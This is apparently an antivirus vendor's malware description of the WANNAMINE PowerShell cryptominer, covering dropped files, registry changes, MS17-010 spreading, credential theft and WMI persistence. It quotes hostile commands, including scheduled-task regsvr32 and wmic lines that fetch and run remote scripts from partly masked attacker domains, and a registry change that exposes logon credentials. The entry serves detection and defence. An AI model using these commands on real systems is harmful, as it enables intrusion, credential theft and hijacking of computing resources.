Coinminer.PS1.WANNAMINE.C

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

It takes advantage of software vulnerabilities to propagate across networks.

It gathers certain information on the affected computer.

It uses the system's central processing unit (CPU) and/or graphical processing unit (GPU) resources to mine cryptocurrency.

Arrival Details

This Coinminer arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Coinminer drops the following files:

• %ProgramData%\Microsoft\Network\Downloader\services.exe (Renamed %User Temp%\nssm)
• %ProgramData%\Microsoft\Network\Connections\OSFMount.sys (Renamed %User Temp%\sys)
• %ProgramData%\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll (Renamed %User Temp%\access)

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

It adds the following processes:

• netstat -anop tcp
• %User Temp%\mon.exe -pSwifck
• %User Temp%\min.exe -pSwifck
• %User Temp%\uas.exe -pSwifcks
• %User Temp%\cohernece.exe
• %ProgramData%\Microsoft\Network\Downloader\services install "Event Logs" %ProgramData%\Microsoft\Network\services.exe | Out-Null
• %ProgramData%\Microsoft\Network\Downloader\services install "Event Service" %ProgramData%\Microsoft\Network\Connections\services.exe | Out-Null
• powercfg /CHANGE -standby-timeout-ac 0
• powercfg /CHANGE -hibernate-timeout-ac 0
• powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %ProgramData% is a version of the Program Files folder where any user on a multi-user computer can make changes to programs. This contains application data for all users. This is usually C:\ProgramData on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit), or C:\Documents and Settings\All Users on Windows Server 2003(32-bit), 2000(32-bit) and XP.)

Autostart Technique

This Coinminer starts the following services:

• Event Logs
• Event Service

Other System Modifications

This Coinminer deletes the following files:

• %User Temp%\mon.exe
• %User Temp%\min.exe
• %User Temp%\uas.exe
• Files in %System%\Tasks\Microsoft\Windows\.NET Framework
• Files in %System%\Tasks\Microsoft\Windows\PLA\System
• %Temp%\y1.bat

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %System% is the Windows system folder, where it usually is C:\Windows\System32 on all Windows operating system versions.. %Temp% is the Windows temporary folder, where it usually is C:\Windows\Temp on all Windows operating system versions.)

It adds the following registry entries:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Windows
RequireSignedAppInit_DLLs = 0

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Windows
LoadAppInit_DLLs = 1

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows NT\CurrentVersion\Windows
AppInit_DLLs = %ProgramData%\Microsoft\Windows\Caches\SecureAssessmentHandlerstor.dll

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\SecurityProviders\WDigest
UseLogonCredential = 1

Propagation

This Coinminer takes advantage of the following software vulnerabilities to propagate across networks:

• Microsoft Windows SMB Server (MS17-010) Vulnerability

Download Routine

This Coinminer accesses the following websites to download files:

• http://{Chosen URL}/ver.txt
• http://{Chosen URL}/nssm.txt
• http://{Chosen URL}/sys.txt
• http://{Chosen URL}/mon.txt
• http://{Chosen URL}/min.txt
• http://{Chosen URL}/access.txt
• http://{Chosen URL}/uas.txt
• http://{Chosen URL}/cohernece.txt

It saves the files it downloads using the following names:

• %User Temp%\nssm → Trojan.Win64.MALXMR.R
• %User Temp%\sys
• %User Temp%\mon.exe → Detected as Coinminer.Win64.MALXMR.SMA
• %User Temp%\min.exe
• %User Temp%\access → Detected as HackTool.Win64.Mimikatz.ENU
• %User Temp%\uas.exe → Trojan.Win32.SABSIK.BM
• %User Temp%\cohernece.exe → Detected as TROJ_REDOS.SM2

Information Theft

This Coinminer gathers the following information on the affected computer:

• Domain credentials

Other Details

This Coinminer uses the system's central processing unit (CPU) and/or graphical processing unit (GPU) resources to mine cryptocurrency. This behavior makes the system run abnormally slow.

It adds the following scheduled tasks:

• Task name: \Microsoft\Windows\RAC\RacTaskMgr
  Task to be run: wmic os get 'http://{Chosen URL}/net/net.xsl'
• Task name: \Microsoft\Windows\MUI\LMRemove
  Task to be run: regsvr32 /u /s /i:http://cat.{BLOCKED}abi.in/networks.xsl scrobj.dll
• Task name: \Microsoft\Windows\Multimedia\SystemEventService
  Task to be run: regsvr32 /u /s /i:http://cat.{BLOCKED }jiji.nl/networks.xsl scrobj.dll
• Task name: \Microsoft\Windows\PLA\System\{Random characters}
  Task to be run: regsvr32 /u /s /i:http://cat.{BLOCKED}shabi.nl/networks.xsl scrobj.dll'

NOTES:

This Coinminer does the following:

• It adds an IPSEC policy named netbc to block incoming traffic for TCP port 445.
• It propagates through the following channels:
  • SMB
• It connects to the following URLs to receive hash information:
  • http://{Chosen URL}/nssmhash.txt
  • http://{Chosen URL}/monhash.txt
  • http://{Chosen URL}/minhash.txt
• It creates the following WMI entries under root\default:
  • System_Anti_Virus_Core (Contains encoded components)
• It creates the following WMI entries under root\subscription:
  • CommandLineEventConsumer
  • Name: Windows Events Consumer
  • CommandLineTemplate: powershell.exe -NoP -NonI -W Hidden -E {Encoded script}
  • __EventFilter
  • Name: Windows Events Filter
  • __FilterToConsumerBinding (Connects the mentioned CommandLineEventConsumer and __EventFilter)
• It removes __EventFilter WMI entries with the following names:
  • fuckyoumm3
  • fuckamm3
  • fuckamm4
  • BotFilter82
  • BotFilterlog
  • BotFilterlogs
  • Eventloger
• It removes CommandLineEventConsumer WMI entries with the following names:
  • fuckyoumm4
  • fuckamm4
  • BotConsumer23
  • BotConsumerlog
  • BotConsumerlogs
  • Eventloger
• It removes __FilterToConsumerBinding WMI entries containing the following strings in its path:
  • fuckyoumm
  • fuckamm
  • BotFilter82
  • BotConsumerlog
  • Eventloger
• It removes __FilterToConsumerBinding WMI entries not matching "Windows Events" in its name
• It chooses among the following URL:
  • cat.{BLOCKED}jiji.nl
  • cat.{BLOCKED}abi.in
  • cat.{BLOCKED}shabi.nl
• It terminates the following processes:
  • Processes containing the following strings in their command line:
  • wmiclass
  • cryptonight
  • System_Anti_Virus_Core
  • Processes with established connection to ports 80, 443, 13531

If affected machine is 32-bit, it downloads and executes the following in the accessed C&C:

• http://{Chosen URL}/networks.ps1